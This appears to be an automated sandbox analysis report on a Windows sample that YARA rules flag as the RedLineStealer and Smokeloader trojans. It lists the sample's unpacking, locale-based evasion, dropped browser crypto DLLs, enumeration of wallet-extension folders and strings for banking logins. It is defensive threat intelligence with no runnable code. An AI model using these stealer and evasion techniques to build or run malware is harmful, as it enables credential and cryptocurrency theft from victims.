Source: 00000000.00000002.3315657325.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/18@1/1

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: 0_2_00414DD0 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

0_2_00414DD0

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll

Jump to behavior

Source: FFAk2gixx5.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: FFAk2gixx5.exe, 00000000.00000003.2673898862.00000000231D4000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000003.2685397085.00000000231C8000.00000004.00000020.00020000.00000000.sdmp, JECBGCFHCFIDHIDHDGDG.0.dr, CGDGHCBGDHJJKECAECBA.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: FFAk2gixx5.exe	ReversingLabs: Detection: 71%
Source: FFAk2gixx5.exe	Virustotal: Detection: 68%

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: mozglue.pdbP source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: mozglue.pdb source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Unpacked PE file: 0.2.FFAk2gixx5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Unpacked PE file: 0.2.FFAk2gixx5.exe.400000.0.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: 0_2_00416230 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00416230

PE file contains an invalid checksum

Source: nss3[1].dll.0.dr	Static PE information: real checksum: 0x202d6c should be: 0x1c592b
Source: vcruntime140[1].dll.0.dr	Static PE information: real checksum: 0x16dd4 should be: 0x14d5a
Source: nss3.dll.0.dr	Static PE information: real checksum: 0x202d6c should be: 0x1c592b
Source: vcruntime140.dll.0.dr	Static PE information: real checksum: 0x16dd4 should be: 0x14d5a

PE file contains sections with non-standard names

Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_004176B5 push ecx; ret	0_2_004176C8
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C373CF push eax; ret	0_2_02C373D6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C373D7 push ecx; ret	0_2_02C373E6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C373A7 push ecx; ret	0_2_02C373BE
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C37377 push eax; ret	0_2_02C37386
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C3711F push eax; ret	0_2_02C37115
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C374EF push ecx; ret	0_2_02C374F6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C374F7 push ecx; ret	0_2_02C37506
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C37497 push eax; ret	0_2_02C374AE
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C374BF push eax; ret	0_2_02C374EE
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C3745F push eax; ret	0_2_02C37466
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C37507 push edx; ret	0_2_02C3751E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C3751F push ecx; ret	0_2_02C37526
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C37527 push ecx; ret	0_2_02C37536
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C3753F push edx; ret	0_2_02C3754E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD791C push ecx; ret	0_2_02FD792F

Drops PE files

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

0_2_00416230

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,GetSystemTimes,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040B610
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040DB60
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040D540
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00412570
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040D1C0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004015C0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_004121F0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00411650
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411B80
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD27D7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_02FD27D7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCD7A7 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_02FCD7A7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD18B7 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_02FD18B7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCB877 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_02FCB877
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD2457 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_02FD2457
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FC1827 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_02FC1827
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCD427 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_02FCD427
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD1DE7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_02FD1DE7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCDDC7 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_02FCDDC7

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: 0_2_00401120 GetSystemInfo,ExitProcess,

0_2_00401120

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: DBFIDGII.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: DBFIDGII.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: DBFIDGII.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: DBFIDGII.0.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: DBFIDGII.0.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: DBFIDGII.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: DBFIDGII.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: DBFIDGII.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
